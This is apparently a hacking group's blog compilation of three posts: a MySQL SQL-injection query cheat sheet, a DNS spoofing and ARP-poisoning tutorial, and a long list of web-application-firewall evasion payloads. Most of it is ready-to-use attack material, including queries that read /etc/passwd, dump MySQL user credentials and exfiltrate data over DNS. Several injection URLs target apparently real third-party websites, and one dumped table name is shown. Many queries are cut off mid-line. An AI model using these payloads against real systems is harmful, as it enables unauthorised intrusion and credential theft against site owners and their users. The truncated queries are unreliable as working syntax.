SQL INJECTION Queries PART-2

22:21 ---

Hello ! Readers

"SQL INJECTION Queries"

[THIS Queries CAN BE USED IN HACKBAR ADDON FIREFOX.]

Version:

SELECT VERSION()
SELECT @@version
SELECT @@version_comment
SELECT @@version_compile_machine
SELECT @@version_compile_os

Directories:

SELECT @@basedir
SELECT @@tmpdir
SELECT @@datadir

Users:

SELECT USER()
SELECT SYSTEM_USER()
SELECT SESSION_USER()
SELECT CURRENT_USER()
Current Database:
SELECT DATABASE()
Concatenation:
SELECT CONCAT('foo','.','bar'); #Returns: foo.bar
SELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Retu
Multi-Concat:
#Stacks the row "foo" from the table "bar" together, using the separa
#Note: This operation can by default only grab 1024 bytes, and do no
#The 1024 byte limit is stored in the @@group_concat_max_len variabl
SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM bar

Better-Concat:

#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROU
#Which therefor allows you to concat strings together up to the @@ma
#instead of @@group_concat_max_len. The default value for @@max_allo
#1048576 bytes, instead of @@group_concat_max_len's 1024.
SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name
Change Collation:
SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from
SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.
Wildcards in SELECT(s):
SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) st
SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) en
Regular Expression in SELECT(s):
#Returns all columns matching the regular expression.
SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'
SELECT Without Dublicates:
SELECT DISTINCT foo FROM bar
Counting Columns:
SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from t
Get Amount of MySQL Users:
SELECT COUNT(user) FROM mysql.user

Get MySQL Users:

SELECT user FROM mysql.user
Get MySQL User Privileges:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us

Get MySQL User Privileges on Different Databases:

SELECT grantee,table_schema,privilege_type FROM information_schema.sc

Get MySQL User Privileges on Different Columns:

SELECT table_schema,table_name,column_name,privilege_type FROM information.schema

Get MySQL User Credentials & Privileges:

SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Upd
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,
File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_p
Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_
Repl_client_priv) FROM mysql.user
Get MySQL DBA Accounts:
SELECT grantee,privilege_type,is_grantable FROM information_schema.us
SELECT host,user FROM mysql.user WHERE Super_priv='Y'

Get Databases:

SELECT schema_name FROM information_schema.schemata
SELECT DISTINCT db FROM mysql.db
SELECT DISTINCT table_schema FROM information_schema.columns
SELECT DISTINCT table_schema FROM information_schema.tables
Get Databases & Tables:
SELECT table_schema,table_name FROM information_schema.tables
SELECT DISTINCT table_schema,table_name FROM information_schema.colu
Get Databases, Tables & Columns:
SELECT table_schema,table_name,column_name FROM information_schema.c
SELECT A Certain Row:
SELECT foo FROM bar LIMIT 0,1; #Returns row 0.
SELECT foo FROM bar LIMIT 1,1; #Returns row 1.
...
SELECT foo FROM bar LIMIT N,1; #Returns row N.
Benchmark (Heavy Query):
#Performs an MD5 calculation of "1" for 10000 times.
SELECT BENCHMARK(10000,MD5(1))
Sleep:
#Works only in MySQL 5 and above.
#Sleeps for 5 seconds, returns 0 on success.
SELECT SLEEP(5)
Conversion (Casting):
SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1
SELECT CAST('65' AS CHAR); #Returns: A
Substring:
SELECT SUBSTR('foobar',1,3); #Returns: foo
Hexadecimal Evasion:
SELECT 0x41424344; #Returns: ABCD
SELECT 0x2E; #Returns: .
SELECT 0x3A; #Returns: :
ASCII to Number:
SELECT ASCII('A'); #Returns: 65
Number to ASCII:
SELECT CHAR(65); #Returns: A
SELECT CHAR(89); #Returns: Y
SELECT CHAR(116,101,115,116); #Returns: test
If Statement:
#Returns 1 if the database is running MySQL 5.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);
#Returns 1 if the database is running MySQL 4.
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);
Case Statement:
#Returns 1 if the database is running MySQL 5.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END
#Returns 1 if the database is running MySQL 4.
SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 END
Read File(s):
#Requires you to have the File_priv in mysql.user. On error this stat
SELECT LOAD_FILE('/etc/passwd')
Write File(s):
#You must use quotes on the filename!
SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'
SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hel
Logical Operator(s):
AND, &&; #The AND operator have && as an alternative syntax.
OR, ||;  #The OR operator have || as an alternative syntax.
NOT, !; #The NOT operator have ! as an alternative syntax.
XOR; #The XOR operator got no alternative syntax.
Fuzzy Code Comment:
#Code within /*! are getting executed by MySQL. Additional /*! can be
SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/
Comments:
SELECT foo, bar FROM foo.bar-- Single line comment
SELECT foo, bar FROM foo.bar/* Multi line comment */
SELECT foo, bar FROM foo.bar# Single line comment
SELECT foo, bar FROM foo.bar;%00 Batched query with additional NULL-
A few evasions/methods to use between your MySQL statements:
CR (%0D); #Carrier Return.
LF (%0A); #Line Feed.
Tab (%09); #The Tab-key.
Space (%20); #Most commonly used. You know what a space is.
Multiline Comment (/**/); #Well, as the name says.
Fuzzy Comment (/*!); #Be sure to end your query with (*/)
Parenthesis, ( and ); #Can also be used as separators when used right
Parenthesis instead of space:
#As said two lines above, the use of parenthesis can be used as a sep
SELECT * FROM foo.bar WHERE id=(-1)UNION(SELECT(1),(2))
Auto-Casting to Right Collation:
SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s)
DNS Requests (OOB (Out-Of-Band)):
#For more information check this.
SELECT YourQuery INTO OUTFILE ‘\\\\www.your.host.com\\?file_to_save_a
Command Execution:
#If you're on a MySQL 4.X server, it's possible to execute OS comman
#It can be done if you're able to upload a shared object into /usr/
#The file extension is .so, and it must contain an "User Defined Fun
#Get raptor_udf.c, it's the source-code for just that feature.
#Remember to compile it for the right CPU Architecture.
#The CPU architecture can be resolved by this query:
SELECT @@version_machine;
<blockquote>A couple of useful blind queries to fingerprint the data
All of these return either True or False, as in, you either get a res
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53;
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52
Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=U
Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql
(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR
(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR
(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(US
LIMIT 0,1)=CHAR(89),1,0)=1
Can MySQL Sleep:
#This query will return True and should take above 1 second to execut
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1
Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47
Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=
Do a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information
Do a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM
Do a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db

more queries comming soon

#Indian_Elite_Hackers

DNS Spoofing PART-II

08:40 ---

Hey !
We are Back
As we promised that we make some new tutorial on DNS Spoofing.

Now Start

What is DNS Spoofing ?

DNS Spoofing is the art of making a DNS entry to point to an another IP
than it would be supposed to point to. To understand better, let's see
an example.You're on your web browser and wish to see the news on
www.cnn.com, without to think of it, you just enter this URL in your
address bar and press enter.
Now, what's happening behind the scenes
? Well... basically, your browser is going to send a request to a DNS
Server to get the matching IP address for www.cnn.com, then the DNS
server tells your browser the IP address of CNN, so your browser to
connect to CNN's IP address and display the content of the main page.
Hold
on a minute... You get a message saying that CNN's web site has closed
because they don't have anymore money to pay for their web site. You're
so amazed, you call and tell that to your best friend on the phone, of
course he's laughing at you, but to be sure, he goes to CNN web site to
check by himself.
You are surprised when he tells you he can see the
news of the day as usual and you start to wonder what's going on. Are
you sure you are talking to the good IP address ?Let's check. You ask
your friend to fire up his favorite DNS resolving tool and to give you
the IP address he's getting for www.cnn.com.Once you got it, you put it
in your browser URL bar :

http://212.153.32.65

You feel ridiculous and frustrated when you see CNN's web page with its
daily news.
Well
you've just been the witness of a DNS hijacking scenario. You're
wondering what happened, did the DNS Server told you the wrong IP
address ? Maybe... At least this is the most obvious answer coming to
our mind.
In fact there are two techniques for accomplishing this DNS hijacking.
Let's see the first one, the "DNS ID Spoofing" technique.

1) DNS Cache Poisoning

As
you can imagine, a DNS server can't store information about all
existing names/IP on the net in its own memory space.That's why DNS
server have a cache, it enables them to keep a DNS record for a while.
In
fact, A DNS Server has the records only for the machines of the domain
it has the authority, if it needs to know about machines out of his
domain, it has to send a request to the DNS Server which handles these
machines and since it doesn't want to ask all the time about records,
it can store in its cache the replies returned by other DNS servers.
Now let's see how someone could poison the cache of our DNS Server.
An
attacker his running is own domain (attacker.net) with his own hacked
DNS Server(ns.attacker.net) . Note that I said hacked DNS Server
because the attacker customized the records in his own DNS server, for
instance one record could be www.cnn.com=81.81.81.81
1) The attacker sends a request to your DNS Server asking it to resolve
www.attacker.net
2) Your DNS Server is not aware of this machine IP address, it doesn't
belongs to his domain, so it needs to asks to the responsible name
server.
3) The hacked DNS Server is replying to your DNS server,
and at the same time, giving all his records (including his record
concerning www.cnn.com) Note : this process is called a zone transfer.
4) The DNS server is not "poisoned".The attacker got his IP, but who
cares, his goal was not to get the IP address of his web server but to
force a zone transfer and make your DNS server poisoned as long as the
cache will not be cleared or updated.
5) Now if you ask your DNS
server, about www.cnn.com IP address it will give you 172.50.50.50,
where the attacker run his own web server. Or even simple, the attacker
could just run a bouncer forwarding all packets to the real web site
and vice versa,so you would see the real web site, but all your traffic
would be passing through the attacker's web site.

2) DNS ID Spoofing

We
saw that when a machine X wants to communicate with a machine Y, the
former always needs the latter IP address. However in most of cases, X
only has the name of Y, in that case, the DNS protocol is used to
resolve the name of Y into its IP address.
Therefore, a DNS request
is sent to a DNS Server declared at X, asking for the IP address of the
machine Y. Meanwhile, the machine X assigned a pseudo random
identification number to its request which should be present in the
answer from the DNS server.Then when the answer from the DNS server
will be received by X, it will just have to compare both numbers if
they're the same, in this case, the answer is taken as valid,otherwise
it will be simply ignored by X.
Does this concept is safe ? Not
completely. Anyone could lead an attack getting this ID number. If
you're for example on LAN, someone who runs a sniffer could intercept
DNS requests on the fly, see the request ID number and send you a fake
reply with the correct ID number... but with the IP address of his
choice.Then, without to realize it, the machine X will be talking to
the IP of attacker's choice thinking it's Y.

By the way, the DNS
protocol relies on UDP for requests (TCP is used only for zone
transfers), which means that it is easy to send a packet coming from a
fake IP since there are no SYN/ACK numbers (Unlike TCP, UDP doesn't
provide a minimum of protection against IP spoofing).

Nevertheless, there are some limitations to accomplish this attack.
In
my example above, the attacker runs a sniffer, intercept the ID number
and replies to his victim with the same ID number and with a reply of
his choice.
In the other hand, even if the attacker intercepted your
request, it will be transmitted to the DNS Server anyway which will
also reply to the request(unless the attacker is blocking the request
at the gateway or carry out ARP cache poisoning which would make the
attack possible on a switched network by the way).
That means that
the attacker has to reply BEFORE the real DNS server, which means that
to succeed this attack, the attacker MUST be on the same LAN so to have
a very quick ping to your machine, and also to be able to capture your
packets.

Practical example ( for
testing purposes ONLY)
To see yourself how to hijack a connection from a machine on your local
area network,we can do the followings :

First step :Poison the ARP cache of the victim's machine (tools and explanations
for realizing this task can be found at http://www.arp-sk.org)

Second step :Now, outgoing packets of the target will be redirected to your host,but
you have to forward the traffic to the real gateway, this can be
achieved witha tool like Winroute Pro.
Third step :We then use WinDNSSpoof,
developed by valgasu (www.securiteinfo.org)
which isa tool that greatly help to carry out DNS ID Spoofing. (Before
to use this tool be sure you have the Winpcap library installed on your
machine, see http://winpcap.polito.it).We
run it in the cmd like :

wds -n www.cnn.com -i 123.123.123.123 -g 00-C0-26-DD-59-CF -v

This
will make www.cnn.com to point to 123.123.123.123 on the victim's
machine. 00-C0-26-DD-59-C being the MAC Address of the gateway or DNS
server.

-----------------------
|#Indian_Elite_Hackers|
-----------------------

WAF BYPASSING PART -II

22:56 ---

WAF evasion methods for sql Injections

I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.

1) id=1+UnIoN+SeLecT 1,2,3 --+

2) id=1+UnIOn/**/SeLect 1,2,3 --+

3) id=1+UNIunionON+SELselectECT 1,2,3 --+

4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+

5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+

6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+

7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+

8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+

/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+

div + 0
Having +1 = 0
AND+ 1 = 0
/*!and*/ +1 = 0
and( 1 )=(0 ) x
OR false the url query
id =- 1 union all select
id =null union all select
id =1 +and+ false + union +all +select
id = 9999 union all select

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//

http : //www.phm.ie/project.php?cat=Conservation'
+and(1)=(0) +union+distinct+select+ 1
and use: and 1=0 to apear column number in the page
or
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0‏)

Hard WAF bypass tips
Whitespaces :
union(select(0),version(),(0),(0),(0),(0),(0),(0),
(0))
%0Aunion%0Aselect%0A1,2,3--
/**/union/**/select/**/1,2,3--
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%20%28select%201,2,version
%28%29,4,5,6,7,8%29%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
NICE QUERY
www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+

www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Bypassing ::
(Double Keyword): UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni<on all sel<ect
%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f
%252a*/
+%23sexsexsex%0AUnIOn%23sexsexsex
%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
like ::
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20union
%23aa%0Aselect%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/**/
union/*!50000select*/
%201,2,version
%28%29,4,5,6,7,8%20--
PHP Code:
http ://www.goavenues.com/
list_itinerary.php?id=-4%20/*!
20000%0d%0aunion*/+/*!20000%0d
%0aSelEct*/%201,2,version
%28%29,4,5,6,7,8%20--
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
after id no. like id=1 +/*!and*/+1=0
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
false the url query :
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id= - 1 union all select
id= null union all select
id=1 +and+false+ union+all+select
id= 9999 union all select
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Order Bypassing do like this
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/
+from /*!information_schema*/./*!tables*/ where
table_schema=database()
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
unhex(hex(Concat
(Column_Name,0x3e,Table_schema,0x3e,table_
Name)))
/*!from*/information_schema.columns/*!where*/
column_name%20/*!like*/char(37,%20112,%2097,
%20115,%20115,%2037)
like ::
PHP Code:
http ://www.westbury.com/
article.php?
article_id=-117%20union%20select
%201,2,unhex%28hex%28Concat
%28Column_Name,0x3e,Table_
schema, 0x3e,table_Name
%29%29%29,4,5,6,7/*!from*/
information_schema.columns/*!
where*/column_name%20/*!like*/
char%2837,%20112,%2097,%20115,
%20115,%2037%29--
user_passwd>westbur6_website>user_info
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-
used with order ::
convert( using ascii) or unhex(hex())
like :
PHP Code:
www. westbury. com/ article. php?
article_id =- 117 union select 1 , 2 ,
convert ( group_concat
(table_name ) using ascii ), 4 , 5 ,6 , 7 +
from +information_schema .tables --
IF'ascii' dosent work? you can try
PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850

------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
Group_Concat
group_concat ()
/*!group_concat*/ ()
grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
group_concat (, 0x3c62723e )
g % 72oup_c % 6Fncat % 28 % 76% 65rsion
% 28 %29 ,% 22 ~ BlackRose% 22 %29
CoNcAt ()
CONCAT (DISTINCT Version ())
concat (, 0x3a ,)
concat %00 ()
% 00CoNcAt ()
/*!50000cOnCat*/ ( /*!Version()*/ )
/*!50000cOnCat*/
/**//*!12345cOnCat*/ (, 0x3a ,)
concat_ws ()
concat (0x3a ,, 0x3c62723e )
/*!concat_ws(0x3a,)*/
concat_ws ( 0x3a3a3a , version()
CONCAT_WS ( CHAR ( 32, 58, 32 ), version
(),)
REVERSE( tacnoc )
binary (version ())
uncompress (compress ( version()))
aes_decrypt ( aes_encrypt ( version
(), 1), 1 )[/ b ][/ u ][/ size ][/ color ]

[~] after id no. like id=1 +/*!and*/+1=0 [~]
+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
cp852
cp866
cp932
dec8
euckr
latin1
utf8
trick to appear info inside img tag
PHP Code:
concat( 0x223e3c62723e ,, 0x3c696d
67207372633d22 )
when the column is get into html tag,but its not
always inside img tag.
it could be <a> or </noscript> or anything.
like ::
PHP Code:
http ://fzszy.chinacourt.org/
public/detail.php?
id=-168' union /*!
%53elect*/ concat
(0x223e3c2f613e3c2f74643e,
version
(),0x3c6120687265663d22)--+

[DUMP DB in 1 Request]
PHP Code:
( select (@) from ( select(@:= 0x00 ),
( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
(@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
( select(@) from ( select (@:= 0x00 ),
( select (@) from ( table ) where (@) in (@:= concat
(@, 0x0a , column1 , 0x3a , column2 )))) a )

[DUMP DB in 1 Request improve]
PHP Code:
( select(@ x ) from (select (@x := 0x00 ),
( select( 0 ) from
( information_schema . columns) where
( table_schema !
= 0x696e666f726d6174696f6e5f736368656d61 )and
( 0x00 ) in(@ x := concat
(@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
like
http : //www.marinaplast.com/page.php?
id=-13 union select 1,2,(select
(@x)from(select(@x:=0x00),(select
(0)from(information_schema.colu​​
mns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and
(0x00)in(@x:=​c​oncat
(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --

WHITESPACES BYPASS .
%09 %0A %0B %0C %0D %A0
get version - DB_NAME - user - HOST_NAME -
datadir
PHP Code:
version()
convert( version() using latin1 )
unhex ( hex( version()))
@@GLOBAL. VERSION
( substr
(@@version ,1 , 1 )=5 ) :: 1 true 0 fals
# like #
www. marinaplast. com/ page . php?
id =- 13 union select 1 , 2 ,( substr
(@@version ,1 , 1 )=5 ), 4, 5 --
1 it 's mean version 5 and 0 mean version 4
+and substring(version(),1,1)=4
+and substring(version(),1,1)=5
+and substring(version(),1,1)=9
+and substring(version(),1,1)=10
# like #
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=5
download good version 5
www.marinaplast.com/page.php?
id=13+and substring(version
(),1,1)=4
not download good version 4
version 5
id=1 /*!50094aaaa*/ error
id=1 /*!50095aaaa*/ no error
id=1 /*!50096aaaa*/ error
# like #
www.marinaplast.com/page.php?id=13 /
*!50095aaaa*/  no error v5
version 4
id=1 /*!40123 1=1*/--+- no error
id=1 /*!40122rrrr*/ no error
# like #
www.marinaplast.com/page.php?id=13 /
*!40122rrrr*/ error not v4
